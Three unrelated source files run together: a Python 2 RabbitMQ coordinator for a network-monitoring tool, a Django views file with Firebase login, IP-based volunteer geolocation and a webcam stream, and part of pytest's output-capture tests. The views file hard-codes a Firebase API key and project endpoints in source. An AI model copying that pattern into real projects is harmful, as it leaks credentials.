Created on 29 May 2016
@author: dgrossman, lanhamt
rabbitmq:
host: poseidon-rabbit
exchange: topic-poseidon-internal
queue(in): poseidon_main
keys: poseidon.algos.#,poseidon.action.#
'''
import json
import logging
import logging.config
import Queue
import threading
import time
import types
from functools import partial
from os import getenv
import pika
import requests
from poseidon.poseidonMain.Config.Config import config_interface
from poseidon.poseidonMain.Investigator.Investigator import investigator_interface
from poseidon.poseidonMain.Scheduler.Scheduler import scheduler_interface
# class NullHandler(logging.Handler):
# def emit(self, record):
# pass
# h = NullHandler()
# module_logger = logging.getLogger(__name__).addHandler(h)
# Configure root logging and create the module-level logger shared by the
# callback function and PoseidonMain.
logging.basicConfig(level=logging.DEBUG)
module_logger = logging.getLogger(__name__)
def callback(ch, method, properties, body, q=None):
    '''callback, places rabbit data into the internal queue

    :param ch: pika channel (unused).
    :param method: delivery metadata; ``routing_key`` identifies the message.
    :param properties: message properties (unused).
    :param body: raw message body.
    :param q: the Queue shared with the main processing loop.
    '''
    module_logger.debug('got a message: {0}:{1}:{2}'.format(
        method.routing_key, body, type(body)))
    # TODO more
    if q is not None:
        q.put((method.routing_key, body))
    else:
        # Fixed typo in the original log message ('posedionMain').
        module_logger.error('poseidonMain workQueue is None')
class PoseidonMain(object):
    '''Main Poseidon coordinator: consumes rabbitmq messages and dispatches
    monitoring/shutdown/allow actions for network endpoints.

    Note: this module is Python 2 code (``except E, e``, ``iteritems``,
    ``types.ListType``).
    '''

    def __init__(self, skip_rabbit=False):
        '''poseidonMain initialization

        :param skip_rabbit: when True, no rabbitmq connections are made.
        '''
        self.skip_rabbit = skip_rabbit
        self.rabbit_connection_local = None
        self.rabbit_channel_local = None
        self.rabbit_connection_vent = None
        self.rabbit_channel_vent = None
        self.logger = module_logger
        self.logger.debug('logger started')
        # Work queue filled by the rabbitmq callback, drained by process().
        self.m_queue = Queue.Queue()
        self.shutdown = False
        self.mod_configuration = dict()
        self.mod_name = self.__class__.__name__
        self.config_section_name = self.mod_name
        self.Investigator = investigator_interface
        self.Investigator.set_owner(self)
        self.Scheduler = scheduler_interface
        self.Scheduler.set_owner(self)
        self.Config = config_interface
        self.Config.set_owner(self)
        self.Config.configure()
        self.Config.configure_endpoints()
        self.Investigator.configure()
        self.Investigator.configure_endpoints()
        self.Scheduler.configure()
        self.Scheduler.configure_endpoints()
        self.monitoring = dict()
        # NOTE(review): ``self.shutdown`` was set to False above and is
        # rebound to a dict here, while handle_item() later assigns True and
        # print_state() calls .iteritems() on it -- the three usages
        # conflict; confirm the intended semantics.
        self.shutdown = dict()
        for item in self.Config.get_section(self.config_section_name):
            my_k, my_v = item
            self.mod_configuration[my_k] = my_v
        self.init_logging()

    def init_logging(self):
        '''setup the logging parameters for poseidon

        Reads a JSON logging-config path from the ``loggingFile`` env var
        (or module configuration); falls back to DEBUG basicConfig.
        '''
        config = None
        path = getenv('loggingFile')
        if path is None:
            path = self.mod_configuration.get('loggingFile')
        if path is not None:
            with open(path, 'rt') as some_file:
                config = json.load(some_file)
            logging.config.dictConfig(config)
        else:
            logging.basicConfig(level=logging.DEBUG)

    @staticmethod
    def make_type_val(item):
        '''normalize messages: split a (routing_key, body) pair'''
        endpoint = None
        value = None
        endpoint, value = item[0], item[1]
        return endpoint, value

    def start_monitor(self, ivalue):
        '''start monitoring an address

        Publishes a start_monitor action for every hash in ``ivalue`` that
        is not already being monitored.
        '''
        self.logger.debug('start_monitor:{0},{1}'.format(ivalue, type(ivalue)))
        r_exchange = 'topic-poseidon-internal'
        r_key = 'poseidon.action.start_monitor'
        r_msg = json.dumps(ivalue)
        for my_hash, my_value in ivalue.iteritems():
            if my_hash not in self.monitoring:
                self.logger.debug(
                    'starting monitoring:{0}:{1}'.format(my_hash, my_value))
                # TODO MSG the collector to begin waiting. contents of my_value
                #
                self.rabbit_channel_local.basic_publish(exchange=r_exchange,
                                                        routing_key=r_key,
                                                        body=r_msg)
                self.monitoring[my_hash] = my_value
            else:
                self.logger.debug(
                    'already being monitored:{0}:{1}'.format(my_hash, my_value))

    def stop_monitor(self, ivalue):
        '''stop monitoring an address and publish a stop_monitor action'''
        for my_hash, my_dict in ivalue.iteritems():
            if my_hash in self.monitoring:
                self.monitoring.pop(my_hash)
        self.logger.debug('stop_monitor:{0},{1}'.format(ivalue, type(ivalue)))
        r_exchange = 'topic-poseidon-internal'
        r_key = 'poseidon.action.stop_monitor'
        r_msg = json.dumps(ivalue)
        self.rabbit_channel_local.basic_publish(exchange=r_exchange,
                                                routing_key=r_key,
                                                body=r_msg)

    def endpoint_shutdown(self, ivalue):
        '''shutdown an endpoint (publish an endpoint_shutdown action)'''
        self.logger.debug('endpoint_shutdown:{0}'.format(ivalue))
        r_exchange = 'topic-poseidon-internal'
        r_key = 'poseidon.action.endpoint_shutdown'
        r_msg = json.dumps(ivalue)
        self.rabbit_channel_local.basic_publish(exchange=r_exchange,
                                                routing_key=r_key,
                                                body=r_msg)

    def endpoint_allow(self, ivalue):
        '''allow an endpoint (publish an endpoint_allow action)'''
        r_exchange = 'topic-poseidon-internal'
        r_key = 'poseidon.action.endpoint_allow'
        r_msg = json.dumps(ivalue)
        self.rabbit_channel_local.basic_publish(exchange=r_exchange,
                                                routing_key=r_key,
                                                body=r_msg)

    def check_db(self, dev_hash, field):
        '''
        Given a device hash and field to look for in
        its record, queries the database for device record
        and returns the given field. Returns None on error.
        '''
        try:
            query = {'dev_id': dev_hash}
            query_string = str(query).replace("\'", "\"")
            ip = self.mod_configuration['storage_interface_ip']
            port = self.mod_configuration['storage_interface_port']
            uri = 'http://' + ip + ':' + port + \
                '/v1/storage/query/{database}/{collection}/{query_str}'.format(
                    database=self.mod_configuration['database'],
                    collection=self.mod_configuration['collection'],
                    query_str=query_string)
            self.logger.error('check_db:{0}:{1}'.format(uri, type(uri)))
            resp = requests.get(uri)
            self.logger.debug('response from db:' + resp.text)
            # resp.text should load into dict 'docs' key for list of
            # documents matching the query - should be only 1 match
            resp = json.loads(resp.text)
            if resp['count'] == 1:
                db_doc = resp['docs'][0]
                self.logger.debug('found db doc: ' + str(db_doc))
                return db_doc[field]
            else:
                # NOTE(review): ``db_doc`` is unbound on this branch, so the
                # call below raises NameError (swallowed by the except); it
                # probably meant to log ``resp`` instead.
                self.logger.debug('bad document in db: ' + str(db_doc))
        except Exception, e:
            self.logger.debug('failed to get record from db' + str(e))
        return None

    def start_vent_collector(self, dev_hash, num_captures=1):
        '''
        Given a device hash and optionally a number of captures
        to be taken, starts vent collector for that device with the
        options specified in poseidon.config.
        '''
        try:
            payload = {'nic': self.mod_configuration['collector_nic'],
                       'id': dev_hash,
                       'interval': self.mod_configuration['collector_interval'],
                       'filter': self.mod_configuration['collector_filter'],
                       'iters': str(num_captures)}
            self.logger.debug('vent payload: ' + str(payload))
            vent_addr = self.mod_configuration[
                'vent_ip'] + ':' + self.mod_configuration['vent_port']
            uri = 'http://' + vent_addr + '/create'
            resp = requests.post(uri, json=payload)
            self.logger.debug('collector repsonse: ' + resp.text)
        except Exception, e:
            self.logger.debug('failed to start vent collector' + str(e))

    @staticmethod
    def just_the_hash(ivalue):
        # Python 2: dict.keys() returns a list, so [0] picks an arbitrary
        # key (the dicts handled here are expected to hold a single hash).
        return ivalue.keys()[0]

    def handle_item(self, itype, ivalue):
        '''Dispatch one (routing_key, body) work item to the right action.'''
        self.logger.debug('handle_item:{0}:{1}'.format(itype, ivalue))
        # just get a string back from the ml stuff
        if 'poseidon.algos.eval_dev_class' not in itype:
            ivalue = json.loads(ivalue)
        if itype == 'poseidon.action.shutdown':
            self.logger.debug('***** shutting down')
            # NOTE(review): rebinding shutdown to True conflicts with
            # print_state(), which iterates it as a dict.
            self.shutdown = True
        if itype == 'poseidon.action.new_machine':
            self.logger.debug('***** new machine {0}'.format(ivalue))
            # tell monitor to monitor
            self.start_vent_collector(self.just_the_hash(ivalue))
            self.start_monitor(ivalue)
        if 'poseidon.algos.eval_dev_class' in itype:
            # ivalue = classificationtype:<string>
            # result form eval device classifier with
            # dev hash attached to end of routing key
            dev_hash = itype.split('.')[-1]
            prev_class = self.check_db(dev_hash, 'dev_classification')
            monitoring_id = self.monitoring[dev_hash]
            temp_d = {dev_hash: monitoring_id}
            # self.stop_monitor(monitoring_id)
            self.stop_monitor(temp_d)
            self.logger.debug('stopping monitoring on:' + itype)
            self.logger.debug('classified as:{0}'.format(ivalue))
            self.logger.debug('classified previously {0}'.format(prev_class))
            if ivalue == prev_class:
                self.logger.debug(
                    '***** allowing endpoint {0}:{1}'.format(itype, temp_d))
                self.endpoint_allow(temp_d)
            else:
                self.logger.debug(
                    '***** shutting down endpoint:{0}:{1}'.format(itype, temp_d))
                self.endpoint_shutdown(temp_d)

    def make_rabbit_connection(self, host, exchange, queue_name, keys):  # pragma: no cover
        '''
        Continuously loops trying to connect to rabbitmq,
        once connected declares the exchange and queue for
        processing algorithm results.
        '''
        wait = True
        channel = None
        connection = None
        while wait:
            try:
                connection = pika.BlockingConnection(
                    pika.ConnectionParameters(host=host))
                channel = connection.channel()
                channel.exchange_declare(exchange=exchange, type='topic')
                channel.queue_declare(queue=queue_name, exclusive=True)
                self.logger.debug('connected to {0} rabbitMQ'.format(host))
                wait = False
            except Exception as e:
                self.logger.debug('waiting for {0} rabbitQM'.format(host))
                self.logger.debug(str(e))
                time.sleep(2)
                wait = True
        # Bind either a list of routing keys or a single string key.
        if isinstance(keys, types.ListType):
            for key in keys:
                self.logger.debug(
                    'array adding key:{0} to rabbitmq channel'.format(key))
                channel.queue_bind(exchange=exchange,
                                   queue=queue_name,
                                   routing_key=key)
        if isinstance(keys, types.StringType):
            self.logger.debug(
                'string adding key:{0} to rabbitmq channel'.format(keys))
            channel.queue_bind(exchange=exchange,
                               queue=queue_name, routing_key=keys)
        return channel, connection

    def init_rabbit(self):  # pragma: no cover
        '''init_rabbit: connect the local poseidon channel.'''
        host = 'poseidon-rabbit'
        exchange = 'topic-poseidon-internal'
        queue_name = 'poseidon_main'
        binding_key = ['poseidon.algos.#', 'poseidon.action.#']
        retval = self.make_rabbit_connection(
            host, exchange, queue_name, binding_key)
        self.rabbit_channel_local = retval[0]
        self.rabbit_connection_local = retval[1]
        host = 'poseidon-vent'
        exchange = 'topic-vent-poseidon'
        queue_name = 'vent_poseidon'
        binding_key = ['vent.#']
        # The vent connection is intentionally disabled; the dead code is
        # kept below as a string literal.
        '''
        retval = self.make_rabbit_connection(
            host, exchange, queue_name, binding_key)
        self.rabbit_channel_vent = retval[0]
        self.rabbit_connection_vent = retval[1]
        '''

    def start_channel(self, channel, mycallback, queue):
        '''handle threading for a messagetype: consume in a worker thread'''
        self.logger.debug('about to start channel {0}'.format(channel))
        channel.basic_consume(
            partial(mycallback, q=self.m_queue), queue=queue, no_ack=True)
        mq_recv_thread = threading.Thread(target=channel.start_consuming)
        mq_recv_thread.start()

    def do_work(self, item):
        '''shuffle item to the correct handlers'''
        itype, ivalue = self.make_type_val(item)
        self.handle_item(itype, ivalue)
        handle_list = self.Scheduler.get_handlers(itype)
        if handle_list is not None:
            for handle in handle_list:
                handle(ivalue)
        handle_list = self.Investigator.get_handlers(itype)
        if handle_list is not None:
            for handle in handle_list:
                handle(ivalue)

    def process(self):
        '''processing loop: poll the work queue once a second.

        Outside of PRODUCTION mode the loop runs at most ``testing_loop``
        iterations so tests terminate.
        '''
        testing_loop = 10
        flag = False
        if getenv('PRODUCTION', 'False') == 'True':
            flag = True
        # NOTE(review): 'PRODDUCTION' below is misspelled, so this log line
        # always prints the default rather than the real PRODUCTION value.
        self.logger.debug('PRODUCTION = {0}'.format(
            getenv('PRODDUCTION', 'False')))
        while not self.shutdown and testing_loop > 0:
            item = None
            workfound = False
            start = time.clock()
            time.sleep(1)
            if not flag:
                testing_loop = testing_loop - 1
            # type , value
            self.logger.debug('about to look for work')
            try:
                item = self.m_queue.get(False)
                self.logger.debug('item:{0}'.format(item))
                self.logger.debug('found work')
                workfound = True
            except Queue.Empty:
                pass
            self.logger.debug('done looking for work!')
            if workfound:  # pragma no cover
                self.do_work(item)
                self.print_state()
            elapsed = time.clock()
            elapsed = elapsed - start
            log_line = 'time to run eventloop is {0} ms' .format(
                elapsed * 1000)
            self.logger.debug(log_line)
        self.logger.debug('Shutting Down')

    def print_state(self):
        # Dump the monitoring and shutdown tables to the debug log.
        # NOTE(review): self.shutdown may have been rebound to the bool True
        # by handle_item(); .iteritems() would then raise.
        self.logger.debug('**********MONITORING**********')
        for my_hash, my_value in self.monitoring.iteritems():
            self.logger.debug('M:{0}:{1}'.format(my_hash, my_value))
        self.logger.debug('***********SHUTDOWN***********')
        for my_hash, my_value in self.shutdown.iteritems():
            self.logger.debug('S:{0}:{1}'.format(my_hash, my_value))
        self.logger.debug('******************************')
def main(skip_rabbit=False):
    '''Program entry point: build the coordinator, optionally wire up
    rabbitmq, then run the processing loop.'''
    poseidon = PoseidonMain(skip_rabbit=skip_rabbit)
    if not skip_rabbit:
        poseidon.init_rabbit()
        poseidon.start_channel(poseidon.rabbit_channel_local,
                               callback, 'poseidon_main')
    poseidon.process()
    return True
# Script entry point: run with rabbit connectivity enabled.
if __name__ == '__main__':  # pragma: no cover
    main(skip_rabbit=False)
|
views.py | from django.shortcuts import render, redirect
from django.http import HttpResponse, StreamingHttpResponse
import threading
import pyrebase
import cv2
from django.contrib.gis.geoip2 import GeoIP2
from .forms import *
from itertools import chain
# from . import db_models as db_method
###########################-FIREBASE SETUP-##############################################
# NOTE(review): credentials are hard-coded in source and committed; consider
# moving them to environment variables or a settings file.
config = {
    "apiKey": "AIzaSyBOXMMnldokTRL1y6Je7sYGx8AFVkNRXRY",
    "authDomain": "smartglass-e01ec.firebaseapp.com",
    "databaseURL": "https://smartglass-e01ec.firebaseio.com",
    "storageBucket": "smartglass-e01ec.appspot.com"
}
# enabling important global variables
firebase = pyrebase.initialize_app(config)
auth = firebase.auth()
db = firebase.database()
##########################################################################################
#---- Firebase authentication service ----#
def signIn(request):
    """Render the login page."""
    return render(request, "login.html")
def postsign(request):
    """Authenticate the posted email/password against Firebase.

    Renders the welcome page on success, or re-renders the login page
    with an error message on failure.
    """
    email = request.POST.get('email')
    passw = request.POST.get("pass")
    try:
        auth.sign_in_with_email_and_password(email, passw)
    except Exception:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
        # are no longer swallowed; any Firebase auth failure lands here.
        message = "Invalid credentials!"
        return render(request, "login.html", {"msg": message})
    return render(request, "welcome.html", {})
#---- New Volunteer Signup----#
def volunteer_signup(request):
    """Handle volunteer signup.

    POST: geolocate the client IP, validate the form and store the new
    volunteer record in Firebase, then render a thank-you page.
    GET: render the signup form together with existing volunteer locations.
    """
    if request.method == 'POST':
        ip = get_client_ip(request)
        # Localhost cannot be geolocated; substitute a public fallback IP
        # *before* the lookup. (The original compared the GeoIP *result*
        # to '127.0.0.1', a check that could never match.)
        if ip == '127.0.0.1':
            ip = '67.134.204.29'
        g = GeoIP2()
        dataset = g.city(str(ip))
        # store new volunteer in Firebase
        vol_form = VolunteerForm(request.POST)
        if vol_form.is_valid():
            vol_data = {
                'First_Name': vol_form.cleaned_data['First_Name'],
                'Last_Name': vol_form.cleaned_data['Last_Name'],
                'Email': vol_form.cleaned_data['Email'],
                'Age': vol_form.cleaned_data['Age'],
                'Gender': vol_form.cleaned_data['Gender'],
                'Latitude': dataset.get('latitude', None),
                'Longitude': dataset.get('longitude', None),
                'City': dataset.get('city', None)
            }
            # The .push method generates a unique timestamp key; no need for hash
            db.child("Volunteers").push(vol_data)
            return render(request, 'thank_you.html', vol_data)
        return render(request, 'thank_you.html', {})
    else:
        locations = get_locations()
        context = {
            'profile_form': VolunteerForm(),
            'my_array': locations
        }
        return render(request, 'new_volunteer.html', context)
def get_client_ip(request):
    """Return the client's IP address, honouring X-Forwarded-For.

    When the request passed through a proxy, the first address in the
    X-Forwarded-For header is the original client; otherwise fall back to
    REMOTE_ADDR.
    """
    forwarded = request.META.get('HTTP_X_FORWARDED_FOR')
    if forwarded:
        return forwarded.split(',')[0]
    return request.META.get('REMOTE_ADDR')
# # returns a list of coordinates to be encoded into GeoJSON
def get_locations():
    """Return the unique volunteer locations stored in Firebase, flattened
    into a single list.
    """
    location_list = []
    all_users = db.child("Volunteers").get()
    for user in all_users.each():
        pair = ((user.val().get('City')), (user.val().get('Latitude')), (user.val().get('Longitude')))
        if pair in location_list:
            pass
        else:
            location_list.append(pair)
    # location_list is a list of unique pairs of tuples denoting different locations
    # now to convert location list from dictionary back into list
    # NOTE(review): chain.from_iterable flattens the tuples, producing
    # [city1, lat1, lon1, city2, ...]; confirm the template expects this
    # flat shape rather than a list of triples.
    location_list = list(chain.from_iterable(location_list))
    return location_list
###########################-ADMIN BASED VIEWS-##############################################
def admin_welcome(request):
    """Render the admin welcome page."""
    return render(request, 'welcome.html', {})
def start_live(request):
    """Render the page that hosts the live camera feed."""
    return render(request, 'live_feed.html', {})
def start_live_feed(request):
    """Stream MJPEG frames as a multipart HTTP response."""
    return StreamingHttpResponse(gen(VideoCamera()), content_type="multipart/x-mixed-replace; boundary=frame")
# object that brings in the view from the drone
class VideoCamera(object):
    """Continuously grabs frames from the default capture device and keeps
    the most recent one available for JPEG streaming.
    """

    def __init__(self):
        self.video = cv2.VideoCapture(0)
        (self.grabbed, self.frame) = self.video.read()
        # Daemon thread so a leftover camera reader cannot keep the server
        # process alive at shutdown (the original thread was non-daemon and
        # its infinite update() loop never exits).
        reader = threading.Thread(target=self.update, args=())
        reader.daemon = True
        reader.start()

    def __del__(self):
        # Release the capture device when the object is collected.
        self.video.release()

    def get_frame(self):
        """Return the most recently grabbed frame encoded as JPEG bytes."""
        image = self.frame
        ret, jpeg = cv2.imencode('.jpg', image)
        return jpeg.tobytes()

    def update(self):
        # Background loop: keep self.frame fresh with the latest capture.
        while True:
            (self.grabbed, self.frame) = self.video.read()
# Module-level camera instance, created (and the device opened) at import time.
cam = VideoCamera()
def gen(camera):
    """Yield an endless MJPEG multipart stream of frames from *camera*.

    :param camera: an object exposing ``get_frame() -> bytes``.

    Fix: the original ignored its *camera* argument and always read from
    the module-level ``cam`` instance.
    """
    while True:
        frame = camera.get_frame()
        yield(b'--frame\r\n'
              b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n\r\n')
test_capture.py | import contextlib
import io
import os
import subprocess
import sys
import textwrap
from io import UnsupportedOperation
from typing import BinaryIO
from typing import cast
from typing import Generator
from typing import TextIO
import pytest
from _pytest import capture
from _pytest.capture import _get_multicapture
from _pytest.capture import CaptureFixture
from _pytest.capture import CaptureManager
from _pytest.capture import CaptureResult
from _pytest.capture import MultiCapture
from _pytest.config import ExitCode
from _pytest.monkeypatch import MonkeyPatch
from _pytest.pytester import Pytester
# note: py.io capture tests where copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
def StdCaptureFD(
    out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
    """Build a MultiCapture that captures at the file-descriptor level."""
    return capture.MultiCapture(
        in_=capture.FDCapture(0) if in_ else None,
        out=capture.FDCapture(1) if out else None,
        err=capture.FDCapture(2) if err else None,
    )
def StdCapture(
    out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
    """Build a MultiCapture that replaces the sys.std* stream objects."""
    return capture.MultiCapture(
        in_=capture.SysCapture(0) if in_ else None,
        out=capture.SysCapture(1) if out else None,
        err=capture.SysCapture(2) if err else None,
    )
def TeeStdCapture(
    out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
    """Build a sys-level MultiCapture that also passes output through."""
    return capture.MultiCapture(
        in_=capture.SysCapture(0, tee=True) if in_ else None,
        out=capture.SysCapture(1, tee=True) if out else None,
        err=capture.SysCapture(2, tee=True) if err else None,
    )
class TestCaptureManager:
    """Tests for the CaptureManager global-capture lifecycle."""

    @pytest.mark.parametrize("method", ["no", "sys", "fd"])
    def test_capturing_basic_api(self, method) -> None:
        """Exercise start/suspend/read/resume/stop for each capture method."""
        capouter = StdCaptureFD()
        # Remember the real streams so the "no" method can be verified.
        old = sys.stdout, sys.stderr, sys.stdin
        try:
            capman = CaptureManager(method)
            capman.start_global_capturing()
            capman.suspend_global_capture()
            outerr = capman.read_global_capture()
            assert outerr == ("", "")
            # Suspending twice must be harmless.
            capman.suspend_global_capture()
            outerr = capman.read_global_capture()
            assert outerr == ("", "")
            print("hello")
            capman.suspend_global_capture()
            out, err = capman.read_global_capture()
            if method == "no":
                assert old == (sys.stdout, sys.stderr, sys.stdin)
            else:
                assert not out
            capman.resume_global_capture()
            print("hello")
            capman.suspend_global_capture()
            out, err = capman.read_global_capture()
            if method != "no":
                assert out == "hello\n"
            capman.stop_global_capturing()
        finally:
            capouter.stop_capturing()

    def test_init_capturing(self) -> None:
        """Starting global capturing twice must raise an AssertionError."""
        capouter = StdCaptureFD()
        try:
            capman = CaptureManager("fd")
            capman.start_global_capturing()
            pytest.raises(AssertionError, capman.start_global_capturing)
            capman.stop_global_capturing()
        finally:
            capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(pytester: Pytester, method: str) -> None:
    """Non-ascii test output must be captured correctly."""
    obj = "'b\u00f6y'"
    pytester.makepyfile(
        """\
# taken from issue 227 from nosetests
def test_unicode():
    import sys
    print(sys.stdout)
    print(%s)
"""
        % obj
    )
    result = pytester.runpytest("--capture=%s" % method)
    result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(pytester: Pytester, method: str) -> None:
    """Escaped non-ascii output must be captured without errors."""
    pytester.makepyfile(
        """\
def test_unicode():
    print('b\\u00f6y')
"""
    )
    result = pytester.runpytest("--capture=%s" % method)
    result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(pytester: Pytester) -> None:
    """Output produced at collection (import) time is captured and shown
    when collection fails.
    """
    p = pytester.makepyfile(
        """
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
    )
    result = pytester.runpytest(p)
    result.stdout.fnmatch_lines(
        [
            "*Captured stdout*",
            "collect 13 failure",
            "*Captured stderr*",
            "collect 13_stderr failure",
        ]
    )
class TestPerTestCapturing:
    """Tests that capture is scoped per test (setup/call/teardown)."""

    def test_capture_and_fixtures(self, pytester: Pytester) -> None:
        """Module/function setup output is attributed to each failing test."""
        p = pytester.makepyfile(
            """
def setup_module(mod):
    print("setup module")
def setup_function(function):
    print("setup " + function.__name__)
def test_func1():
    print("in func1")
    assert 0
def test_func2():
    print("in func2")
    assert 0
"""
        )
        result = pytester.runpytest(p)
        result.stdout.fnmatch_lines(
            [
                "setup module*",
                "setup test_func1*",
                "in func1*",
                "setup test_func2*",
                "in func2*",
            ]
        )

    @pytest.mark.xfail(reason="unimplemented feature")
    def test_capture_scope_cache(self, pytester: Pytester) -> None:
        """Setup output should be reported separately from call output."""
        p = pytester.makepyfile(
            """
import sys
def setup_module(func):
    print("module-setup")
def setup_function(func):
    print("function-setup")
def test_func():
    print("in function")
    assert 0
def teardown_function(func):
    print("in teardown")
"""
        )
        result = pytester.runpytest(p)
        result.stdout.fnmatch_lines(
            [
                "*test_func():*",
                "*Captured stdout during setup*",
                "module-setup*",
                "function-setup*",
                "*Captured stdout*",
                "in teardown*",
            ]
        )

    def test_no_carry_over(self, pytester: Pytester) -> None:
        """Output of a passing test must not leak into a later failure."""
        p = pytester.makepyfile(
            """
def test_func1():
    print("in func1")
def test_func2():
    print("in func2")
    assert 0
"""
        )
        result = pytester.runpytest(p)
        s = result.stdout.str()
        assert "in func1" not in s
        assert "in func2" in s

    def test_teardown_capturing(self, pytester: Pytester) -> None:
        """A failing teardown report includes setup, call and teardown output."""
        p = pytester.makepyfile(
            """
def setup_function(function):
    print("setup func1")
def teardown_function(function):
    print("teardown func1")
    assert 0
def test_func1():
    print("in func1")
    pass
"""
        )
        result = pytester.runpytest(p)
        result.stdout.fnmatch_lines(
            [
                "*teardown_function*",
                "*Captured stdout*",
                "setup func1*",
                "in func1*",
                "teardown func1*",
                # "*1 fixture failure*"
            ]
        )

    def test_teardown_capturing_final(self, pytester: Pytester) -> None:
        """Output of a failing module teardown is captured and reported."""
        p = pytester.makepyfile(
            """
def teardown_module(mod):
    print("teardown module")
    assert 0
def test_func():
    pass
"""
        )
        result = pytester.runpytest(p)
        result.stdout.fnmatch_lines(
            [
                "*def teardown_module(mod):*",
                "*Captured stdout*",
                "*teardown module*",
                "*1 error*",
            ]
        )

    def test_capturing_outerr(self, pytester: Pytester) -> None:
        """stdout and stderr are captured separately for the failing test."""
        p1 = pytester.makepyfile(
            """\
import sys
def test_capturing():
    print(42)
    sys.stderr.write(str(23))
def test_capturing_error():
    print(1)
    sys.stderr.write(str(2))
    raise ValueError
"""
        )
        result = pytester.runpytest(p1)
        result.stdout.fnmatch_lines(
            [
                "*test_capturing_outerr.py .F*",
                "====* FAILURES *====",
                "____*____",
                "*test_capturing_outerr.py:8: ValueError",
                "*--- Captured stdout *call*",
                "1",
                "*--- Captured stderr *call*",
                "2",
            ]
        )
class TestLoggingInteraction:
    """Interaction between output capturing and the stdlib logging module."""

    def test_logging_stream_ownership(self, pytester: Pytester) -> None:
        # Closing a logging stream owned by the test must not trigger
        # atexit-time errors from the logging module.
        # NOTE(review): the embedded test references `capture` without
        # importing it and so fails with NameError — the assertion here only
        # cares that no "atexit" noise reaches stderr.
        p = pytester.makepyfile(
            """\
            def test_logging():
                import logging
                import pytest
                stream = capture.CaptureIO()
                logging.basicConfig(stream=stream)
                stream.close() # to free memory/release resources
            """
        )
        result = pytester.runpytest_subprocess(p)
        assert result.stderr.str().find("atexit") == -1

    def test_logging_and_immediate_setupteardown(self, pytester: Pytester) -> None:
        # Logging from setup/call/teardown of the same scope must all be
        # captured, under both capture methods.
        p = pytester.makepyfile(
            """\
            import logging
            def setup_function(function):
                logging.warning("hello1")
            def test_logging():
                logging.warning("hello2")
                assert 0
            def teardown_function(function):
                logging.warning("hello3")
                assert 0
            """
        )
        for optargs in (("--capture=sys",), ("--capture=fd",)):
            print(optargs)
            result = pytester.runpytest_subprocess(p, *optargs)
            s = result.stdout.str()
            result.stdout.fnmatch_lines(
                ["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"]  # errors show first!
            )
            # verify proper termination
            assert "closed" not in s

    def test_logging_and_crossscope_fixtures(self, pytester: Pytester) -> None:
        # Same as above but logging happens at module setup/teardown scope.
        p = pytester.makepyfile(
            """\
            import logging
            def setup_module(function):
                logging.warning("hello1")
            def test_logging():
                logging.warning("hello2")
                assert 0
            def teardown_module(function):
                logging.warning("hello3")
                assert 0
            """
        )
        for optargs in (("--capture=sys",), ("--capture=fd",)):
            print(optargs)
            result = pytester.runpytest_subprocess(p, *optargs)
            s = result.stdout.str()
            result.stdout.fnmatch_lines(
                ["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"]  # errors come first
            )
            # verify proper termination
            assert "closed" not in s

    def test_conftestlogging_is_shown(self, pytester: Pytester) -> None:
        # Logging emitted while importing conftest.py goes to stderr with -s.
        pytester.makeconftest(
            """\
            import logging
            logging.basicConfig()
            logging.warning("hello435")
            """
        )
        # make sure that logging is still captured in tests
        result = pytester.runpytest_subprocess("-s", "-p", "no:capturelog")
        assert result.ret == ExitCode.NO_TESTS_COLLECTED
        result.stderr.fnmatch_lines(["WARNING*hello435*"])
        assert "operation on closed file" not in result.stderr.str()

    def test_conftestlogging_and_test_logging(self, pytester: Pytester) -> None:
        pytester.makeconftest(
            """\
            import logging
            logging.basicConfig()
            """
        )
        # make sure that logging is still captured in tests
        p = pytester.makepyfile(
            """\
            def test_hello():
                import logging
                logging.warning("hello433")
                assert 0
            """
        )
        result = pytester.runpytest_subprocess(p, "-p", "no:capturelog")
        assert result.ret != 0
        result.stdout.fnmatch_lines(["WARNING*hello433*"])
        assert "something" not in result.stderr.str()
        assert "operation on closed file" not in result.stderr.str()

    def test_logging_after_cap_stopped(self, pytester: Pytester) -> None:
        # Logging from fixture teardown after a KeyboardInterrupt must not
        # crash capture resumption (no AttributeError on resume_capturing).
        pytester.makeconftest(
            """\
            import pytest
            import logging

            log = logging.getLogger(__name__)

            @pytest.fixture
            def log_on_teardown():
                yield
                log.warning('Logging on teardown')
            """
        )
        # make sure that logging is still captured in tests
        p = pytester.makepyfile(
            """\
            def test_hello(log_on_teardown):
                import logging
                logging.warning("hello433")
                assert 1
                raise KeyboardInterrupt()
            """
        )
        result = pytester.runpytest_subprocess(p, "--log-cli-level", "info")
        assert result.ret != 0
        result.stdout.fnmatch_lines(
            ["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
        )
        assert (
            "AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
            not in result.stderr.str()
        )
class TestCaptureFixture:
    """Behavior of the capsys/capfd/capsysbinary/capfdbinary fixtures."""

    @pytest.mark.parametrize("opt", [[], ["-s"]])
    def test_std_functional(self, pytester: Pytester, opt) -> None:
        # capsys works both with and without global capture disabled (-s).
        reprec = pytester.inline_runsource(
            """\
            def test_hello(capsys):
                print(42)
                out, err = capsys.readouterr()
                assert out.startswith("42")
            """,
            *opt,
        )
        reprec.assertoutcome(passed=1)

    def test_capsyscapfd(self, pytester: Pytester) -> None:
        # Requesting capsys and capfd together is an error, in either order.
        p = pytester.makepyfile(
            """\
            def test_one(capsys, capfd):
                pass
            def test_two(capfd, capsys):
                pass
            """
        )
        result = pytester.runpytest(p)
        result.stdout.fnmatch_lines(
            [
                "*ERROR*setup*test_one*",
                "E*capfd*capsys*same*time*",
                "*ERROR*setup*test_two*",
                "E*capsys*capfd*same*time*",
                "*2 errors*",
            ]
        )

